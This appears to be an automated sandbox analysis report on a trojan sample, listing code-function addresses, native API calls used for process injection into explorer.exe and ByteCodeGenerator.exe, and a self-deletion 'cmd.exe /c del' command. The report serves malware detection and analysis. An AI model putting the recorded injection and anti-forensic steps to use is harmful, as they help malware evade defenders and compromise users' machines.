          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_018726000_2_01872600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_0187A9E80_2_0187A9E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_0187EB080_2_0187EB08
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_01878B700_2_01878B70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_01872C180_2_01872C18
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_0187F4F00_2_0187F4F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_0187A9F80_2_0187A9F8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_0187EFA70_2_0187EFA7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_0187AEF00_2_0187AEF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_009DEAE80_2_009DEAE8
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041E9D93_2_0041E9D9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0040928C3_2_0040928C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_004092903_2_00409290
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0040DC303_2_0040DC30
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041E77C3_2_0041E77C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041DF9E3_2_0041DF9E
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F2B283_2_034F2B28
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EDBD23_2_034EDBD2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345EBB03_2_0345EBB0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F22AE3_2_034F22AE
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342F9003_2_0342F900
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034441203_2_03444120
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E10023_2_034E1002
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F28EC3_2_034F28EC
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343B0903_2_0343B090
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034520A03_2_034520A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F20A83_2_034F20A8
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F1FF13_2_034F1FF1
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034ED6163_2_034ED616
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03446E303_2_03446E30
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F2EF73_2_034F2EF7
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F1D553_2_034F1D55
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F2D073_2_034F2D07
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03420D203_2_03420D20
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F25DD3_2_034F25DD
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343D5E03_2_0343D5E0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034525813_2_03452581
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034ED4663_2_034ED466
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343841F3_2_0343841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05671D5512_2_05671D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AF90012_2_055AF900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05672D0712_2_05672D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A0D2012_2_055A0D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C412012_2_055C4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056725DD12_2_056725DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BD5E012_2_055BD5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D258112_2_055D2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B841F12_2_055B841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566100212_2_05661002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056728EC12_2_056728EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055BB09012_2_055BB090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056720A812_2_056720A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D20A012_2_055D20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05672B2812_2_05672B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05671FF112_2_05671FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566DBD212_2_0566DBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055DEBB012_2_055DEBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C6E3012_2_055C6E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05672EF712_2_05672EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_056722AE12_2_056722AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0334929012_2_03349290
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0334928C12_2_0334928C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335E9D912_2_0335E9D9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335E77C12_2_0335E77C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03342FB012_2_03342FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03342D9012_2_03342D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0334DC3012_2_0334DC30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 055AB150 appears 35 times
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: String function: 0342B150 appears 35 times
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041A330 NtCreateFile,3_2_0041A330
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041A3E0 NtReadFile,3_2_0041A3E0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041A460 NtClose,3_2_0041A460
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041A510 NtAllocateVirtualMemory,3_2_0041A510
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041A32F NtCreateFile,3_2_0041A32F
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041A45A NtClose,3_2_0041A45A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0041A50A NtAllocateVirtualMemory,3_2_0041A50A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469A50 NtCreateFile,LdrInitializeThunk,3_2_03469A50
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_03469A00
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469A20 NtResumeThread,LdrInitializeThunk,3_2_03469A20
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03469910
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034699A0 NtCreateSection,LdrInitializeThunk,3_2_034699A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469840 NtDelayExecution,LdrInitializeThunk,3_2_03469840
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03469860
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034698F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_034698F0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469710 NtQueryInformationToken,LdrInitializeThunk,3_2_03469710
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469FE0 NtCreateMutant,LdrInitializeThunk,3_2_03469FE0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469780 NtMapViewOfSection,LdrInitializeThunk,3_2_03469780
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034697A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_034697A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03469660
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034696E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_034696E0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469540 NtReadFile,LdrInitializeThunk,3_2_03469540
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034695D0 NtClose,LdrInitializeThunk,3_2_034695D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469B00 NtSetValueKey,3_2_03469B00
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0346A3B0 NtGetContextThread,3_2_0346A3B0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469A10 NtQuerySection,3_2_03469A10
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469A80 NtOpenDirectoryObject,3_2_03469A80
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469950 NtQueueApcThread,3_2_03469950
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034699D0 NtCreateProcessEx,3_2_034699D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0346B040 NtSuspendThread,3_2_0346B040
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469820 NtEnumerateKey,3_2_03469820
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034698A0 NtWriteVirtualMemory,3_2_034698A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469760 NtOpenProcess,3_2_03469760
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469770 NtSetInformationFile,3_2_03469770
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0346A770 NtOpenThread,3_2_0346A770
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0346A710 NtOpenProcessToken,3_2_0346A710
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469730 NtQueryVirtualMemory,3_2_03469730
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469650 NtQueryValueKey,3_2_03469650
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469670 NtQueryInformationProcess,3_2_03469670
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469610 NtEnumerateValueKey,3_2_03469610
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034696D0 NtCreateKey,3_2_034696D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469560 NtWriteFile,3_2_03469560
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03469520 NtWaitForSingleObject,3_2_03469520
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0346AD30 NtSetContextThread,3_2_0346AD30
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034695F0 NtQueryInformationFile,3_2_034695F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9540 NtReadFile,LdrInitializeThunk,12_2_055E9540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_055E9910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E95D0 NtClose,LdrInitializeThunk,12_2_055E95D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E99A0 NtCreateSection,LdrInitializeThunk,12_2_055E99A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9840 NtDelayExecution,LdrInitializeThunk,12_2_055E9840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9860 NtQuerySystemInformation,LdrInitializeThunk,12_2_055E9860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9710 NtQueryInformationToken,LdrInitializeThunk,12_2_055E9710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9FE0 NtCreateMutant,LdrInitializeThunk,12_2_055E9FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9780 NtMapViewOfSection,LdrInitializeThunk,12_2_055E9780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9650 NtQueryValueKey,LdrInitializeThunk,12_2_055E9650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9A50 NtCreateFile,LdrInitializeThunk,12_2_055E9A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_055E9660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E96D0 NtCreateKey,LdrInitializeThunk,12_2_055E96D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E96E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_055E96E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9950 NtQueueApcThread,12_2_055E9950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9560 NtWriteFile,12_2_055E9560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055EAD30 NtSetContextThread,12_2_055EAD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9520 NtWaitForSingleObject,12_2_055E9520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E99D0 NtCreateProcessEx,12_2_055E99D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E95F0 NtQueryInformationFile,12_2_055E95F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055EB040 NtSuspendThread,12_2_055EB040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9820 NtEnumerateKey,12_2_055E9820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E98F0 NtReadVirtualMemory,12_2_055E98F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E98A0 NtWriteVirtualMemory,12_2_055E98A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9770 NtSetInformationFile,12_2_055E9770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055EA770 NtOpenThread,12_2_055EA770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9760 NtOpenProcess,12_2_055E9760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055EA710 NtOpenProcessToken,12_2_055EA710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9B00 NtSetValueKey,12_2_055E9B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9730 NtQueryVirtualMemory,12_2_055E9730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055EA3B0 NtGetContextThread,12_2_055EA3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E97A0 NtUnmapViewOfSection,12_2_055E97A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9670 NtQueryInformationProcess,12_2_055E9670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9610 NtEnumerateValueKey,12_2_055E9610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9A10 NtQuerySection,12_2_055E9A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9A00 NtProtectVirtualMemory,12_2_055E9A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9A20 NtResumeThread,12_2_055E9A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E9A80 NtOpenDirectoryObject,12_2_055E9A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335A330 NtCreateFile,12_2_0335A330
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335A3E0 NtReadFile,12_2_0335A3E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335A510 NtAllocateVirtualMemory,12_2_0335A510
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335A460 NtClose,12_2_0335A460
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335A32F NtCreateFile,12_2_0335A32F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335A50A NtAllocateVirtualMemory,12_2_0335A50A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0335A45A NtClose,12_2_0335A45A
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487709362.0000000004CCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487917026.0000000004D33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBytecodeGenerator.exej% vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.489529032.0000000004EB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.489015113.0000000004E4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.485534643.0000000003539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeVirustotal: Detection: 28%
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess created: C:\Windows\SysWOW64\ByteCodeGenerator.exe C:\Windows\SysWOW64\ByteCodeGenerator.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeProcess created: C:\Windows\SysWOW64\ByteCodeGenerator.exe C:\Windows\SysWOW64\ByteCodeGenerator.exeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Variant.Tedy.130342.18814.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@7/1@6/4
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, gQVNSLKQRdLXahbPI/IAccountProvider.csTask registration methods: 'CreateAccountWithUIAsync'
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, TTTaeWOQfcIUZMhgd/IVSAccountProviderShim.csTask registration methods: 'CreateAccountWithUIAsync'
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic file information: File size 1932800 > 1048576
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1cdc00
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: explorer.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: D:\v2.0\A1\_work\56\obj\Release.AnyCPU\Vssf.InteractiveClient\MS.VS.Services.Client.Interactive\Microsoft.VisualStudio.Services.Client.Interactive.pdb source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp
          Source: Binary string: wntdll.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ByteCodeGenerator.exe, ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: ByteCodeGenerator.pdb source: explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: ByteCodeGenerator.pdbGCTL source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
